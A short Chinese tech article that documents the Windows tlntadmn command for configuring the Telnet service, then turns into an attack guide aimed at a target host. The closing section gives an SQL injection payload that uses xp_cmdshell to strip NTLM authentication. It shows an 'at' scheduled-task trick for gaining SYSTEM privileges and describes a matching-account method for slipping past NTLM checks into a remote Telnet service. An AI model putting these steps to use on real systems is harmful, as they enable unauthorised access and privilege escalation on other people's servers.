扫一扫
分享文章到微信
扫一扫
关注官方公众号
至顶头条
telnet可以帮助我们完成远程的登录设置,那么管理员如何对端口认证等系统进行管理呢?这里我们就来介绍一下tlntadmn命令的用法。这个命令可以帮助我们完成telnet服务的这些设置。那么,tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
所有会话用 'all'.
-s sessionid 列出会话的信息.
-k sessionid 终止会话.
-m sessionid 发送消息到会话.
config 配置Telnet服务器参数.
common_options 为:
-u user 指定要使用其凭据的用户
-p password 用户密码
config_options 为:
dom = domain 设定用户的默认域
ctrlakeymap = yes|no 设定 ALT 键的映射
timeout = hh:mm:ss 设定空闲会话超时值 timeoutactive = yes|no 启用空闲会话.
maxfail = attempts 设定断开前失败的登录企图数.
maxconn = connections 设定最大连接数.
port = number 设定Telnet端口.
sec = [+/-]NTLM [+/-]passwd 设定身份验证机构
fname = file 指定审计文件名.
fsize = size 指定审计文件的最大尺寸(MB).
mode = console|stream 指定操作模式.
auditlocation = eventlog|file|both 指定记录地点
audit = [+/-]user [+/-]fail [+/-]admin 指定审计的事件
使用的办法:
直接运行命令:tlntadmn config sec = -ntlm
注射的话可以直接运行:;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'--运行以后就去掉了ntlm认证.
C:\\>tlntadmn config sec = -ntlm -----------------使用admin权限
C:\\>at 20:43 /interactive "cmd" -----------at命令启用system权限
新加了一项作业,其作业 ID = 1
C:\\WINNT\\system32>tlntadmn config sec = -ntlm
去除NTML验证的另一个方法:在目标主机上建立好一个管理员用户!在本机建立一个和目标主机上相同的帐号密码的用户,在本机CMD上右击选择运行方式~ 输入该帐号和密码,直接Telnet服务的目标IP, 既可直接饶过NTML验证.
如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。